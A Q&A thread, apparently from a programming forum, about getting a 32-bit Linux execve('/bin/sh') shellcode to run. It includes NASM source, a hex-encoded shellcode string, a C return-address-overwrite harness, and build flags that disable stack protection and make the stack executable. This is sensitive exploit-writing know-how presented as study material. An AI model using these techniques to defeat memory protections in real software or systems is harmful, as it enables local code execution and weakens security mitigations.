how to disable Data Execution prvention(DEP) in ubuntu to execute shellcode

Question

am using ubuntu 14.04, 64bit. i am studying shellcode writing. So to spawn a shell i wrote the following program

segment .text
global _start:
_start:


jmp short GotoCall

shellcode:
    pop esi
    xor eax, eax
    mov byte [esi + 7], al          #here i get Error
    lea ebx, [esi]
    mov long [esi + 8], ebx
    mov long [esi + 12], eax

    mov byte al, 0x0b
    mov ebx, esi
    lea ecx, [esi + 8]
    lea edx, [esi + 12]     
    int 80h

GotoCall:
    call shellcode
    Db '/bin/shJAAAABBBB'

Compiled -> nasm -ggdb -f elf Shellcode_Execve.asm

Linked -> ld -m elf_i386 -ggdb -o Shellcode_Execve Shellcode_Execve.o

When i ran it in GDB, i found in below instruction i get error,

mov byte [esi + 7], al

i found that, this is because of DEP(DATA EXECUTION PREVENTION). So i tried "-fno-stack-protector -z execstack" to compile and link like below,

$ nasm -ggdb -f elf32 -z execstack Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb -f elf32 -z execstack -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb -z execstack -f elf32  -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb  -fno-stack-protector -z execstack -z execstack -f elf32  -o shell Shellcode_Execve.asm
nasm: fatal: unrecognised output format `no-stack-protector' - use -hf for a list
type `nasm -h' for help

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o
Shellcode_Execve.o:Shellcode_Execve.asm:5: multiple definition of `_start'
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o:(.text+0x0): first defined here
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o: In function `_start':
(.text+0x18): undefined reference to `main'
collect2: error: ld returned 1 exit status

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o

$ ./Shellcode_Execve 
Segmentation fault (core dumped)

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ ld -m elf_i386 -ggdb -z execstack -o Shellcode_Execve Shellcode_Execve.o

$ ./Shellcode_Execve 
Segmentation fault (core dumped)

like above i tried all the ways to disable DEP using GCC and ld. But nothing works. So how can i disable DEP? and make my Code working? (please make sure the problem is of DEP)

mr.Cracker · Accepted Answer · 2014-07-10T06:09:11.227

i have changed my NASM code a little bit now it looks like below,

section .mytext progbits alloc exec write align=16  ; CHANGED HERE
    global _start:
_start:
    jmp short GotoCall

    shellcode:
        pop esi
        xor eax, eax
        mov byte [esi + 7], al
        lea ebx, [esi]
        mov long [esi + 8], ebx
        mov long [esi + 12], eax

        mov byte al, 0x0b
        mov ebx, esi
        lea ecx, [esi + 8]
        lea edx, [esi + 12]        
        int 80h

    GotoCall:
        call shellcode
        Db '/bin/shJAAAABBBB'

The .text section is not writable by default. Just changed the first line to

"section .mytext progbits alloc exec write align=16 "

for details about progbits alloc exec write,please click here.

And the linker has some default override so it ignores writable .text even if you ask for it. But it doesn't care if it has a different name.

now compile and link it,

nasm -f elf32 Shellcode_Execve.asm
ld -m elf_i386 -o Shellcode_Execve Shellcode_Execve.o

Now it WORKSSSS:)

score 0 · Answer 2 · answered Apr 06 '17 at 18:43

I know I'm really late but I have been battling with this same code and the gcc stack protections. When turning it into shellcode with objdump -d I ended up with:

char shellcode[]="\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main()
{
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

Then, with the help of your tips I was able to compile and run it with:

~/Shellcode$ gcc -fno-stack-protector -z execstack execShellSpawn.c -o execShellSpawn

Without -z execstack I get a Segfault. Without -fno-stack-protector it accomplishes about as much as exit(0).

how to disable Data Execution prvention(DEP) in ubuntu to execute shellcode

2 Answers2